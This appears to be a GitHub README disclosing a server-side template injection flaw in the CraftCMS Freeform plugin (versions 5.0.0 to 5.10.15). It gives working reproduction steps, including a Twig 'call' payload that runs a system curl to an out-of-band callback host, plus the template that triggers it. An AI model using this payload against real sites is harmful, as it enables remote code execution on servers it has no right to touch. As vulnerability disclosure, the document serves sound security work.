Skip to content

TimTrademark/CVE-2025-52122

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
img
img
 
 
README.md
README.md
 
 

Repository files navigation

CVE CraftCMS Freeform

CraftCMS Freeform contains an SSTI vulnerability, resulting in arbitrary code injection for all users that have access to editing a form (submission title).

Vulnerable versions are v5.0.0 < v5.10.16.

Steps to reproduce

Create a form:

create a form

I created the form "pentest" here as a proof-of-concept. Next, under settings set the following submission title (change domain name to your own server):

{{ 'system' | call('curl http://gwgyynafr4feu5xecukf1h2nqew5kw8l.oastify.com/rce') }}

submission title

This will execute an arbitrary system call. In this case, I perform a curl to a controlled server that will notify me in case there are incoming connections. Next, include this form in a template/page and submit it:

<h1>test</h1>
{% set form = freeform.form('pentest') %}

{% if form %}
  {{ form.render() }}
{% else %}
  <p>Form not found.</p>
{% endif %}

This will have called the curl command. We can verify this by looking at the incoming HTTP request that was created:

incoming connection

The root cause of this issue is that Freeform implements the "call" Twig filter without validating user input. This was fixed in the following commit.

About

Arbitrary code injection in CraftCMS Freeform 5.0.0 < 5.10.16

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published